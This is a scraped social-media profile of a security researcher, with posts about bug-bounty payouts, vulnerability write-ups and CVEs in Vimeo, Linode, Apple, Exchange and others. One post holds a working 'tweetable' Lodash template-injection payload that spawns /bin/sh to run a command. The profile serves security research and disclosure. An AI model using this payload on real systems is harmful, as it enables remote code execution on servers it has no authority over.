user avatar
Harsh Jaiswal
@rootxharsh
Building @hacktronai | researching at @httpvoid0x2f | auditing at @cure53berlin | prev @zomato @vimeo @pdiscoveryio
Joined April 2015
1,209
Following
22.3K
Followers
Posts
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Mar 8, 2019
    Did a Write up of Vimeo SSRF , It was an interesting one. RT if you like it.
    Vimeo SSRF with code execution potential.
    From infosecwriteups.com
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Dec 12, 2020
    Just got $50k (2*25k) for our RCE. waiting for approval to publish our writeup. cc @iamnoooob
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Sep 13, 2020
    Sat down with @iamnoooob and worked on the recent Mobileiron MDM RCE by @orange_8361 and what a great find, Here's an RCE PoC using JNDI Injection via local classloading reference triggered using Hessian deserialization as stated in the blog. github.com/iamnoooob/CVE-โ€ฆ
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Dec 17, 2019
    Finally got the approval, Here are multiple Linode's access token stealing/account takeover bugs, I like the second one. Retweet if you like it. #bugbounty
    infosecwriteups.com
    Abusing feature to steal your tokens
    In mid-2018, Linode private Hackerone program got me engaged because of how well the program was getting managed. I found quite of issuesโ€ฆ
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Nov 22, 2019
    I bought something with bounty ๐Ÿ˜
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Jun 3, 2020
    Exploited Lodash SSTI with @iamnoooob via process binding spawn_sync. Here's a tweetable RCE PoC ${x=Object}${w=a=new x}${w.type="pipe"}${w.readable=1}${w.writable=1}${a.file="/bin/sh"}${a.args=["/bin/sh","-c","id"]}${a.stdio=[w,w]}${process.binding("spawn_sync").spawn(a).output}
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Jul 11, 2020
    Follow me for more chrome 0dayzzzz #bugbountytip #bugbounty #p1 #chrome_0day #googlevrp #nice_catch /s
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Jan 15, 2021
    Hereโ€™s our Apple RCE writeup!
    user avatar
    Rahul Maini
    @iamnoooob
    Jan 15, 2021
    I and @rootxharsh found and exploited a 0Day RCE in Apple's Travel Portal and were rewarded with $50K. Here's the write-up for that: github.com/httpvoid/writeโ€ฆ
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Nov 20, 2019
    After more than two years of hacking on @Vimeo, Am excited to share that am joining them as Application Security Engineer ๐Ÿค˜. Its time to go on the other side!
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Aug 17, 2021
    FYI - this is what the triagers go through on daily basis in mass amounts. oof.
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Nov 12, 2021
    We've been assigned with CVE-2021-41349 for pre-auth Reflected XSS in MS Exchange. Found this with @iamnoooob months back while playing with Proxyshell lol. github.com/httpvoid/CVE-Rโ€ฆ msrc.microsoft.com/update-guide/vโ€ฆ
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Jul 17, 2021
    There's a lot of blind following in infosec. Sometimes, fame is valued more than skills.
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Mar 14, 2019
    $30k goal by @bhavukjain1 is completed. Me and @tweetrpersonal9 just got $30k from @PayPalInfoSec at @Hacker0x01
  • user avatar
    Harsh Jaiswal
    @rootxharsh
    Apr 25, 2021
    Sat down with @iamnoooob and did this Exiftool (CVE-2021-22204) RCE. Nice one @wcbowling! Now let's try to fit this in a jpeg.